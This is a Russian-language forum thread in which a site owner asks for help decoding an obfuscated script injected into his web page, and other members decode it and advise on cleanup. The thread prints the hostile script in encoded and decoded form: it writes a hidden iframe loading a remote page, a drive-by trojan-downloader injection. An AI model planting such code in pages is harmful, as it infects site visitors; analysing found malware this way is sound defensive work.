Перейти к контенту

Помогите расшифровать скрипт


Рекомендуемые сообщения

Вот это обнаружил сегодян в теле штмл страницы:

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%39%62%36%31%63%38%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%69%6b%61%72%75%73%2d%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%6b%70%70%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%37%38%31%32%29%2b%27%64%38%36%66%35%5c%27%20%77%69%64%74%68%3d%32%34%34%20%68%65%69%67%68%74%3d%37%33%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

По ходу меня взломали и прописали это. Но правда запуститься оно не смогло так как в том файле символы " были запрещены.

Как я понял это закодированый скрипт. Но что внутри я так и непонял. Как это расшифровать и что это может быть?

Ссылка на комментарий
Поделиться на других сайтах

<script>alert(unescape("%77%69%6e%64%6f%77%2e...")); </script>

 

 

Не нужно его расшифровывать, нужно менять пароли на FTP, очищать файлы от этой гадости и проверять компьютер на трояны. Каким FTP-клиентом пользуетесь?

post-36662-1207772865_thumb.png

Ссылка на комментарий
Поделиться на других сайтах

<script>eval(unescape("window.status='Done';document.write('<iframe name=9b61c83 src=\'http://ikarus-security.com/kpp/index.php?'+Math.round(Math.random()*17812)+'d86f5\' width=244 height=73 style=\'display: none\'></iframe>')")); </script>

Заифреймили тебя, меняй пароли на FTP и проверяй комп на вирусы.

Ссылка на комментарий
Поделиться на других сайтах

sudmed, Яндекс и вправду жжёт :D
Ссылка на комментарий
Поделиться на других сайтах

Sannis - аттач не могу открыть - пишет нет прав доступа. И при чём тут яндекс?

Я пользуюсь FileZilla последней версии и PHPExpertEditor последней версии.

Даже не знаю, как пароль могли взломать - он 17тизначный с русскими символами и цифрами в перемешку.

Антивирус НОД32 последеней версии не взломаный (родной).

Никаких подозрительных файлов не открываю никогда. По аське на подозрительные контакты даже не отвечаю. Вообщем хз.

 

Кстати в других файлах этого нет. К счастью.

 

sudmed - как ты это расскрыл?

 

Самый прикол что сайт то новый, ему то и месяца нет, и на него заходит максимум 10 человек в сутки. И то одни и теже.

Ну и плюс тот факт что сайт написан на практически чистом штмл, с елементами пхп вставки файлов, тоесть залезть в него ну никак нельзя.

Ссылка на комментарий
Поделиться на других сайтах

sudmed, Яндекс и вправду жжёт

Sannis, это ты про яндекс применительно к данной теме или вообще про мировую революцию, Садовского и Платонов? :D

 

sudmed - как ты это расскрыл?

mrMad-Cat, инструментов для шифровки-расшифровки в свободном доступе полно (у меня софт специфический, тебе такой вряд ли нужен).

Хотя NOD32 неплохой антивирь, тем более потратился на лицензию, но попробуй просканировать систему любым другим нормальным антивирем.

Ссылка на комментарий
Поделиться на других сайтах

В лоб можно его прочесть как я выше написал, в аттаче просто скин, не копируется у меня то что alert выводит.

А sudmed заюзел как раз таки какой-по поисковик, или тулзу, для unescap'а. Например можно вбить любое слово в Яндекс, потом в адресной строке заменить закодированное это слово на текст скрипта, enter. Тогда в окошке для ввода слов для поиска будет расшифрованная строка :D

 

http://www.yandex.ru/yandsearch?clid=9582&...20%3C/script%3E

Ссылка на комментарий
Поделиться на других сайтах

Хе, ловко придумано с яндексом :D))

 

Вообще прикольно вышло, пока сидел у меня по ходу пытались ещё и аську стырить. Но я её отбил. Сейчас везде менял пароли (вот это муки так муки).

 

Обнаружил что эта гадость прописалась ещё и в индекс файл форума и индекс ещё одного сайта. Короче хз как она пролезла. Надо бы каким-то мокаром проверить вообще другеи файлы.

Реально надо сканировать свой комп. Токо ставить что-то тяжёлое типа касперского или нортона совершенно не хочется.

 

ЗЫ: А нод у меня не лицензия, а просто триал версия. В ней ключи переодически новые вводишь и она работает. Купить у меня его так и не вышла - официально купить я могу только через украинского дистрибютора который продаёт в 2 раза дороже.

 

ЗЗЫ: а если честно то после последнего апдейта винды комп ведёт себя очень странно - каптчи на разных сайтах показываются только если их открывать в отдельном окне как картинки + не всегда грузится скин к примеру на яндексе и на некоторых других сайтах. Толи просто ИЕ очень строгий стал и ему ничего не нравится.

Ссылка на комментарий
Поделиться на других сайтах

О, вот каково оно! Нашёл при сканировании:

C:\Documents and Settings\mrMad-Cat\Local Settings\Temporary Internet Files\Content.IE5\W0OTWVD1\in[1].htm - JS/TrojanDownloader.Iframe.EY.gen trojan - cleaned by deleting - quarantined [1]

И как он проскачил... Наверно с кряком каким-то.

Ссылка на комментарий
Поделиться на других сайтах

mrMad-Cat

Не пускай IE в инет вообще, запрети ему все в фаерволе (желатенльно не использовать встроенный фаеровл ибо г. он)

Вместо IE Opera или FireFox используй.

А IE был и будет одной большой брешью в безопасности компов.

Ссылка на комментарий
Поделиться на других сайтах

Я не люблю другие браузеры - они некоректно обрабатывают ксс и штмл, нет поддержки ксс3 и так далее. Та и ИЕ7 удобнее намного и быстрее работает. А безопасность нигде гарантироватся не может. Если захотят сломать - сломают.

 

Кстати, после последнего обновления винды у меня таки некоторые сайты отображаются без стиля. Интерестно где это исправить. Вконтакте вообще всё без столбцов и без шрифтов.

Ссылка на комментарий
Поделиться на других сайтах

Ну тогда жди новых троянов т.к. они без твоего ведома через IE проползут без проблем.

Ну или запускай IE в SandBoxed-режиме (см. одноименную прожку).

Ссылка на комментарий
Поделиться на других сайтах

Я не люблю другие браузеры - они некоректно обрабатывают ксс и штмл, нет поддержки ксс3 и так далее.

Я бы не стал так безаппеляционно.

А то смотри глотку ведь вырвут :D

Ссылка на комментарий
Поделиться на других сайтах

использую 3 браузера, после каждого изменения смотрю в них результат

по статистике гугля_аналитика, посетители пользуются:

Internet Explorer 40,53 %

Opera 34,85 %

Firefox 23,96 %

остальные много меньше

так что ругай ие или не ругай, а оптимизация должна быть под него 100%

 

 

по теме, кроме указанного способа расшифровки Санниса, можно еще использовать firebug

Ссылка на комментарий
Поделиться на других сайтах

Я же не говорю про то что не использовать IE вообще, а говорю про то нужно перекрывать IE доступ в инет и не юзать его для инет-серфинга (в том случае если нам есть что терять в смысле данных с компа).
Ссылка на комментарий
Поделиться на других сайтах

Вот это обнаружил сегодян в теле штмл страницы:

<script>eval(unescape("[8<] </script>

Заменил eval на alert и получил картинку:

http://i30.tinypic.com/ok6c9k.gif

Это если уж так любопытно, что за гадость у тебя сидела...

Ссылка на комментарий
Поделиться на других сайтах

FatCat Ну это я уже увидел, но вот только я не понял что этот ифрем или что это вообещ делало. Я только понял что оно было скрыто и связано с каким-то сайтом.

 

Song Я же сказал что я не люблю. :D Я знаю что многие юзают фаерфокс и оперу. У меня у самого стоит опера, нетскейп, фаерфокс и сафари. Но я их не могу юзать - они меня раздражают. Только для проверки того, как сайт смотрится после редактирований.

Ссылка на комментарий
Поделиться на других сайтах

×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.